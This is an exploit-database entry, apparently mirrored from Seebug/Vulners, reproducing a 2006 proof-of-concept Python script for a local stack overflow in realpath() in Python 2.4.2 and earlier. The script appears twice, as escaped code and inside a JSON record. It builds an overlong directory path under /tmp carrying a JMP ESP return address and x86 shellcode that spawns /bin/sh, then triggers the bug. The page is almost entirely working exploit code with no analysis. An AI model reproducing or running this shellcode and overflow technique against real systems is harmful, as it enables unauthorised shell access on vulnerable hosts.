Search...

Python <= 2.4.2 realpath() Local Stack Overflow Exploit

2014-07-01T00:00:00

ID SSV:63424
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/python
 
# gexp-python.py
# 
# Python &#60;= 2.4.2 realpath() Local Stack Overflow
# -----------------------------------------------
# Against VA Space Randomization.
#
# Copyright (c) 2006 Gotfault Security
#
# Bug found and developed by: dx/vaxen (Gotfault Security),
#			      posidron (Tripbit Research Group).
# Enviroment:
#
# Kernel Version	 : 2.6.12.5-vs2.0
# GCC Version		 : 4.0.3
# Libc Version		 : 2.3.5
#
# Special greets goes to : posidron from tripbit.net
#			   RFDSLabs, barros, izik,
#			   Gotfault Security Community.
#
# Original Reference:
# http://gotfault.net/research/exploit/gexp-python.py

import os

# JMP *%ESP @ linux-gate.so.1
jmp    = &#34;\x5f\xe7\xff\xff&#34;

shell  = &#34;\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e&#34;
shell += &#34;\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3&#34;
shell += &#34;\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1&#34;
shell += &#34;\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68&#34;

os.chdir(&#34;/tmp&#34;)
base = os.getcwd()
dir = os.path.join(&#34;A&#34;*250, &#34;A&#34;*250, &#34;A&#34;*250, &#34;A&#34;*250, &#34;A&#34;*42, jmp+shell)
os.makedirs(dir)
os.chdir(dir)

os.system(&#39;&#62; vuln.py; python vuln.py&#39;)
os.remove(&#34;vuln.py&#34;)
os.chdir(base)
os.removedirs(dir)

# milw0rm.com [2006-03-18]

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T16:29:08", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-19T16:29:08", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:29:08", "rev": 2}, "vulnersScore": 0.0}, "href": "https://www.seebug.org/vuldb/ssvid-63424", "references": [], "enchantments_done": [], "id": "SSV:63424", "title": "Python <= 2.4.2 realpath() Local Stack Overflow Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n #!/usr/bin/python\r\n \r\n# gexp-python.py\r\n# \r\n# Python <= 2.4.2 realpath() Local Stack Overflow\r\n# -----------------------------------------------\r\n# Against VA Space Randomization.\r\n#\r\n# Copyright (c) 2006 Gotfault Security\r\n#\r\n# Bug found and developed by: dx/vaxen (Gotfault Security),\r\n#\t\t\t posidron (Tripbit Research Group).\r\n# Enviroment:\r\n#\r\n# Kernel Version\t : 2.6.12.5-vs2.0\r\n# GCC Version\t\t : 4.0.3\r\n# Libc Version\t\t : 2.3.5\r\n#\r\n# Special greets goes to : posidron from tripbit.net\r\n#\t\t\t RFDSLabs, barros, izik,\r\n#\t\t\t Gotfault Security Community.\r\n#\r\n# Original Reference:\r\n# http://gotfault.net/research/exploit/gexp-python.py\r\n\r\nimport os\r\n\r\n# JMP *%ESP @ linux-gate.so.1\r\njmp = "\\x5f\\xe7\\xff\\xff"\r\n\r\nshell = "\\xeb\\x1a\\x5e\\x31\\xc0\\x88\\x46\\x07\\x8d\\x1e"\r\nshell += "\\x89\\x5e\\x08\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3"\r\nshell += "\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\xe8\\xe1"\r\nshell += "\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68"\r\n\r\nos.chdir("/tmp")\r\nbase = os.getcwd()\r\ndir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell)\r\nos.makedirs(dir)\r\nos.chdir(dir)\r\n\r\nos.system('> vuln.py; python vuln.py')\r\nos.remove("vuln.py")\r\nos.chdir(base)\r\nos.removedirs(dir)\r\n\r\n# milw0rm.com [2006-03-18]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63424", "type": "seebug", "immutableFields": []}

Python &lt;= 2.4.2 realpath() Local Stack Overflow Exploit

Description

No description provided by source.

Python <= 2.4.2 realpath() Local Stack Overflow Exploit